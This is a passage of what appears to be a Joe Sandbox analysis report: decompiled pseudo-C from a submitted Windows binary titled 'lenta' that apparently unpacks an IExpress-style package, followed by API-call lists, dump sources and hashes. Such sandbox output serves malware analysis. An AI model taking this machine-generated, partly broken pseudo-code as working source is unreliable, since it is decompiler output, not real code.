                                                                                                                                                                                                                                              				 *0x9793ec = 1;
                                                                                                                                                                                                                                              				_t20 = E0097468F("TITLE", 0x979154, 0x7f);
                                                                                                                                                                                                                                              				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                              					_t64 = 0x4b1;
                                                                                                                                                                                                                                              					goto L32;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                              					 *0x97858c = _t27;
                                                                                                                                                                                                                                              					SetEvent(_t27);
                                                                                                                                                                                                                                              					_t64 = 0x979a34;
                                                                                                                                                                                                                                              					if(E0097468F("EXTRACTOPT", 0x979a34, 4) != 0) {
                                                                                                                                                                                                                                              						if(( *0x979a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                                                              							 *0x979120 =  *0x979120 & _t65;
                                                                                                                                                                                                                                              							if(E00975C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                              								if( *0x978a3a == 0) {
                                                                                                                                                                                                                                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                              									if(_t31 != 0) {
                                                                                                                                                                                                                                              										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x978184 != 0) {
                                                                                                                                                                                                                                              										__imp__#17();
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x978a24 == 0) {
                                                                                                                                                                                                                                              										_t57 = _t65;
                                                                                                                                                                                                                                              										if(E009736EE(_t65) == 0) {
                                                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t33 =  *0x979a40; // 0x3
                                                                                                                                                                                                                                              											_t48 = 1;
                                                                                                                                                                                                                                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                              												if(( *0x979a34 & 0x00000100) == 0 || ( *0x978a38 & 0x00000001) != 0 || E009718A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t64 = 0x7d6;
                                                                                                                                                                                                                                              													if(E00976517(_t57, 0x7d6, _t34, E009719E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                              														goto L33;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												L30:
                                                                                                                                                                                                                                              												_t23 = _t48;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t23 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00972390(0x978a3a);
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t64 = 0x520;
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								E009744B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 =  &_v268;
                                                                                                                                                                                                                                              							if(E0097468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                              								 *0x978588 = _t43;
                                                                                                                                                                                                                                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(( *0x979a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                              										_t64 = 0x524;
                                                                                                                                                                                                                                              										if(E009744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                              											goto L12;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L11;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t64 = 0x54b;
                                                                                                                                                                                                                                              										E009744B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                              										CloseHandle( *0x978588);
                                                                                                                                                                                                                                              										 *0x979124 = 0x800700b7;
                                                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t64 = 0x4b1;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00972cb5
                                                                                                                                                                                                                                              0x00972cbc
                                                                                                                                                                                                                                              0x00972cc7
                                                                                                                                                                                                                                              0x00972cc9
                                                                                                                                                                                                                                              0x00972cd1
                                                                                                                                                                                                                                              0x00972cd3
                                                                                                                                                                                                                                              0x00972cd9
                                                                                                                                                                                                                                              0x00972ce9
                                                                                                                                                                                                                                              0x00972cf9
                                                                                                                                                                                                                                              0x00972d0e
                                                                                                                                                                                                                                              0x00972d15
                                                                                                                                                                                                                                              0x00972d1c
                                                                                                                                                                                                                                              0x00972ef3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972d2d
                                                                                                                                                                                                                                              0x00972d34
                                                                                                                                                                                                                                              0x00972d3b
                                                                                                                                                                                                                                              0x00972d40
                                                                                                                                                                                                                                              0x00972d48
                                                                                                                                                                                                                                              0x00972d59
                                                                                                                                                                                                                                              0x00972d84
                                                                                                                                                                                                                                              0x00972e1f
                                                                                                                                                                                                                                              0x00972e1f
                                                                                                                                                                                                                                              0x00972e2e
                                                                                                                                                                                                                                              0x00972e41
                                                                                                                                                                                                                                              0x00972e5a
                                                                                                                                                                                                                                              0x00972e62
                                                                                                                                                                                                                                              0x00972e6c
                                                                                                                                                                                                                                              0x00972e6c
                                                                                                                                                                                                                                              0x00972e75
                                                                                                                                                                                                                                              0x00972e77
                                                                                                                                                                                                                                              0x00972e77
                                                                                                                                                                                                                                              0x00972e84
                                                                                                                                                                                                                                              0x00972e8b
                                                                                                                                                                                                                                              0x00972e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972e96
                                                                                                                                                                                                                                              0x00972e96
                                                                                                                                                                                                                                              0x00972e9e
                                                                                                                                                                                                                                              0x00972ea2
                                                                                                                                                                                                                                              0x00972eba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972ece
                                                                                                                                                                                                                                              0x00972ede
                                                                                                                                                                                                                                              0x00972eed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972eed
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972ea2
                                                                                                                                                                                                                                              0x00972e86
                                                                                                                                                                                                                                              0x00972e88
                                                                                                                                                                                                                                              0x00972e88
                                                                                                                                                                                                                                              0x00972e43
                                                                                                                                                                                                                                              0x00972e48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972e48
                                                                                                                                                                                                                                              0x00972e30
                                                                                                                                                                                                                                              0x00972e30
                                                                                                                                                                                                                                              0x00972ef8
                                                                                                                                                                                                                                              0x00972f01
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f01
                                                                                                                                                                                                                                              0x00972d8a
                                                                                                                                                                                                                                              0x00972d8f
                                                                                                                                                                                                                                              0x00972da1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972da3
                                                                                                                                                                                                                                              0x00972dae
                                                                                                                                                                                                                                              0x00972db4
                                                                                                                                                                                                                                              0x00972dbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972dca
                                                                                                                                                                                                                                              0x00972dd3
                                                                                                                                                                                                                                              0x00972df5
                                                                                                                                                                                                                                              0x00972e02
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972dd5
                                                                                                                                                                                                                                              0x00972dde
                                                                                                                                                                                                                                              0x00972de3
                                                                                                                                                                                                                                              0x00972e04
                                                                                                                                                                                                                                              0x00972e0a
                                                                                                                                                                                                                                              0x00972e10
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972e10
                                                                                                                                                                                                                                              0x00972dd3
                                                                                                                                                                                                                                              0x00972dbb
                                                                                                                                                                                                                                              0x00972da1
                                                                                                                                                                                                                                              0x00972d5b
                                                                                                                                                                                                                                              0x00972d5b
                                                                                                                                                                                                                                              0x00972d5d
                                                                                                                                                                                                                                              0x00972d69
                                                                                                                                                                                                                                              0x00972d6e
                                                                                                                                                                                                                                              0x00972f06
                                                                                                                                                                                                                                              0x00972f06
                                                                                                                                                                                                                                              0x00972f06
                                                                                                                                                                                                                                              0x00972d59
                                                                                                                                                                                                                                              0x00972f18

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972CD9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972CE9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972CF9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00972D34
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00972D40
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00972DAE
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00972DBD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00972E0A
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                              • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                              • Opcode ID: b96c19942f4d07b80e2923a0d1a77125e3a7b56e0becf4e12ec8437c211cc3e1
                                                                                                                                                                                                                                              • Instruction ID: d61a9b559dd7a67e0425c1c90fc36ac0c154764a250288c1105ce1f11dd45835
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b96c19942f4d07b80e2923a0d1a77125e3a7b56e0becf4e12ec8437c211cc3e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D51F5737783016BE724A7249C4AB7B369CEBC5B04F40C439F94DD51E2EBB48881E625
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                                                                              			E009734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					 *0x9791d8 = 1;
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					_push(_a4);
                                                                                                                                                                                                                                              					L21:
                                                                                                                                                                                                                                              					EndDialog();
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				_pop(1);
                                                                                                                                                                                                                                              				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                              					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t35 = _a4;
                                                                                                                                                                                                                                              					 *0x978584 = _t35;
                                                                                                                                                                                                                                              					E009743D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                              					__eflags =  *0x978184; // 0x1
                                                                                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                              					_t17 = CreateThread(0, 0, E00974FE0, 0, 0, 0x978798);
                                                                                                                                                                                                                                              					 *0x97879c = _t17;
                                                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						E009744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t35);
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t23 = _t13 - 1;
                                                                                                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 2;
                                                                                                                                                                                                                                              					if(_a12 != 2) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					ResetEvent( *0x97858c);
                                                                                                                                                                                                                                              					_t38 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              					_t25 = E009744B9(_t38, 0x4b2, 0x971140, 0, 0x20, 4);
                                                                                                                                                                                                                                              					__eflags = _t25 - 6;
                                                                                                                                                                                                                                              					if(_t25 == 6) {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						 *0x9791d8 = 1;
                                                                                                                                                                                                                                              						SetEvent( *0x97858c);
                                                                                                                                                                                                                                              						_t39 =  *0x97879c; // 0x0
                                                                                                                                                                                                                                              						E00973680(_t39);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t25 - 1;
                                                                                                                                                                                                                                              					if(_t25 == 1) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetEvent( *0x97858c);
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                              					TerminateThread( *0x97879c, 0);
                                                                                                                                                                                                                                              					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x009734fb
                                                                                                                                                                                                                                              0x009734fe
                                                                                                                                                                                                                                              0x00973665
                                                                                                                                                                                                                                              0x00973666
                                                                                                                                                                                                                                              0x00973666
                                                                                                                                                                                                                                              0x00973668
                                                                                                                                                                                                                                              0x0097366e
                                                                                                                                                                                                                                              0x0097366e
                                                                                                                                                                                                                                              0x00973671
                                                                                                                                                                                                                                              0x00973671
                                                                                                                                                                                                                                              0x00973677
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973677
                                                                                                                                                                                                                                              0x00973504
                                                                                                                                                                                                                                              0x00973506
                                                                                                                                                                                                                                              0x00973507
                                                                                                                                                                                                                                              0x0097350c
                                                                                                                                                                                                                                              0x0097365b
                                                                                                                                                                                                                                              0x0097365f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973661
                                                                                                                                                                                                                                              0x00973512
                                                                                                                                                                                                                                              0x00973515
                                                                                                                                                                                                                                              0x009735be
                                                                                                                                                                                                                                              0x009735c1
                                                                                                                                                                                                                                              0x009735d1
                                                                                                                                                                                                                                              0x009735d8
                                                                                                                                                                                                                                              0x009735de
                                                                                                                                                                                                                                              0x009735f8
                                                                                                                                                                                                                                              0x00973617
                                                                                                                                                                                                                                              0x00973617
                                                                                                                                                                                                                                              0x00973623
                                                                                                                                                                                                                                              0x00973637
                                                                                                                                                                                                                                              0x0097363d
                                                                                                                                                                                                                                              0x00973642
                                                                                                                                                                                                                                              0x00973644
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973646
                                                                                                                                                                                                                                              0x00973652
                                                                                                                                                                                                                                              0x00973657
                                                                                                                                                                                                                                              0x00973658
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973658
                                                                                                                                                                                                                                              0x00973644
                                                                                                                                                                                                                                              0x0097351b
                                                                                                                                                                                                                                              0x0097351d
                                                                                                                                                                                                                                              0x0097354f
                                                                                                                                                                                                                                              0x00973553
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097355f
                                                                                                                                                                                                                                              0x00973565
                                                                                                                                                                                                                                              0x0097357c
                                                                                                                                                                                                                                              0x00973581
                                                                                                                                                                                                                                              0x00973584
                                                                                                                                                                                                                                              0x0097359b
                                                                                                                                                                                                                                              0x009735a1
                                                                                                                                                                                                                                              0x009735a7
                                                                                                                                                                                                                                              0x009735ad
                                                                                                                                                                                                                                              0x009735b3
                                                                                                                                                                                                                                              0x009735b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009735b8
                                                                                                                                                                                                                                              0x00973586
                                                                                                                                                                                                                                              0x00973588
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973590
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973590
                                                                                                                                                                                                                                              0x00973524
                                                                                                                                                                                                                                              0x00973535
                                                                                                                                                                                                                                              0x00973541
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973549
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000), ref: 00973535
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00973541
                                                                                                                                                                                                                                              • ResetEvent.KERNEL32 ref: 0097355F
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00971140,00000000,00000020,00000004), ref: 00973590
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 009735C7
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 009735F1
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 009735F8
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 00973610
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00973617
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00973623
                                                                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 00973637
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00973671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                              • Opcode ID: cb31eaf1c9c840ba5555237a6c0b3f37b1a64bb9fb867e06dfc1cbe70ead930b
                                                                                                                                                                                                                                              • Instruction ID: 9510708d32e93eba871b465b91617b8399e5a94de0025b81815bafed9d4eea63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb31eaf1c9c840ba5555237a6c0b3f37b1a64bb9fb867e06dfc1cbe70ead930b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9631917325C300BBD7201F25AC4EE2B3A68E7C5B11F50C929F61E952A1CB758981FA59
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                                              			E00974224(char __ecx) {
                                                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				char* _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				char* _t61;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				char* _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                                                                              				char _t76;
                                                                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t67 = __ecx;
                                                                                                                                                                                                                                              				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                                                                                                              					_t63 = 0x4c2;
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					E009744B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                              				_v12 = _t26;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t63 = 0x4c1;
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                              				_v20 = _t28;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                              				_v16 = _t29;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t76 =  *0x9788c0; // 0x0
                                                                                                                                                                                                                                              				if(_t76 != 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					 *0x9787a0 = 0;
                                                                                                                                                                                                                                              					_v52 = _t67;
                                                                                                                                                                                                                                              					_v48 = 0;
                                                                                                                                                                                                                                              					_v44 = 0;
                                                                                                                                                                                                                                              					_v40 = 0x978598;
                                                                                                                                                                                                                                              					_v36 = 1;
                                                                                                                                                                                                                                              					_v32 = E00974200;
                                                                                                                                                                                                                                              					_v28 = 0x9788c0;
                                                                                                                                                                                                                                              					 *0x97a288( &_v52);
                                                                                                                                                                                                                                              					_t32 =  *_v12();
                                                                                                                                                                                                                                              					if(_t71 != _t71) {
                                                                                                                                                                                                                                              						asm("int 0x29");
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_v12 = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						 *0x97a288(_t32, 0x9788c0);
                                                                                                                                                                                                                                              						 *_v16();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *0x9788c0 != 0) {
                                                                                                                                                                                                                                              							E00971680(0x9787a0, 0x104, 0x9788c0);
                                                                                                                                                                                                                                              						}
